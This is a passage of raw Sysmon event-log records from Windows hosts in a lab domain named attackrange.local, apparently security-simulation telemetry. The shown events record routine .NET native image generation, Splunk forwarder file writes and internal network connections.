indows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000080496Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:41.872{A7A01FEF-EC21-607E-A00E-00000000BB01}6964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1b34-0\Microsoft.VisualStudio.Tools.Applications.Hosting.dll2021-04-20 14:58:41.872 10341000x800000000000000080495Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.591{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC21-607E-A00E-00000000BB01}6964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080494Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.591{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC21-607E-A00E-00000000BB01}6964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080493Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.591{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71204028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC21-607E-A00E-00000000BB01}6964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080492Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.544{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC21-607E-9F0E-00000000BB01}3640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080491Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.544{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC21-607E-9F0E-00000000BB01}3640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080490Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.544{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC21-607E-9F0E-00000000BB01}3640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080489Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.513{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC21-607E-9E0E-00000000BB01}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080488Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.497{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC21-607E-9E0E-00000000BB01}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080487Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.497{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC21-607E-9E0E-00000000BB01}2940C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000080486Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.450{A7A01FEF-EC21-607E-9D0E-00000000BB01}5356NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NR4C3OCW54\Microsoft.VisualBasic.Compatibility.Data.ni.dll.auxMD5=AED35F64188965AD3C3CD5DC0C7C3E99,SHA256=700CA50EC6B119209A2C82787CBCADCC88B135AE4322AB3C388EE883F768941A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080485Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.450{A7A01FEF-EC21-607E-9D0E-00000000BB01}5356NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NR4C3OCW54\Microsoft.VisualBasic.Compatibility.Data.ni.dllMD5=D5E0DC610397075D4B483063AE730762,SHA256=7FF1B188568862A6879E2E0970E6A7C50F93635DB396C14FB2B48315FCB4C187,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000080484Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:41.419{A7A01FEF-EC21-607E-9D0E-00000000BB01}5356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\14ec-0\Microsoft.VisualBasic.Compatibility.Data.dll2021-04-20 14:58:41.419 354300x800000000000000080483Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:39.313{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57578-false10.0.1.12-8000- 23542300x800000000000000080482Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.341{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=917AAA80F11E786FF76BFBC3AB6157EB,SHA256=072FBBE1B6CFFDC2D76B334C54B770AAB915BAC2588F6DBADF1E152E45010973,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080481Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.060{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC21-607E-9D0E-00000000BB01}5356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080480Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.044{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC21-607E-9D0E-00000000BB01}5356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080479Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:41.044{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71204028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC21-607E-9D0E-00000000BB01}5356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000050574Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:38.745{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52540-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000050573Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:41.170{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E3A0934C70C32210F845E8919E97685,SHA256=59D71C441A05D0DAEF34570C5F469EF42B48935CFFD43070ACCF117250579F0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050572Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:41.108{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8E54921D117F6AAFFFCDD1D32E9405C6,SHA256=62DD5D679AFB0850171091DF3A1CC11ECC0AF6A0B1A6838D557CD48D7E3EF60C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080561Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.982{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC22-607E-A60E-00000000BB01}5488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080560Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.982{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71204028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC22-607E-A60E-00000000BB01}5488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080559Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.950{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC22-607E-A50E-00000000BB01}4960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080558Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.919{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC22-607E-A50E-00000000BB01}4960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080557Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.919{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC22-607E-A50E-00000000BB01}4960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000080556Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:42.872{A7A01FEF-EC22-607E-A40E-00000000BB01}4148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1034-0\Microsoft.VisualStudio.Tools.Applications.ServerDocument.dll2021-04-20 14:58:42.872 10341000x800000000000000080555Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.560{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080554Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.560{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080553Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.560{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080552Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 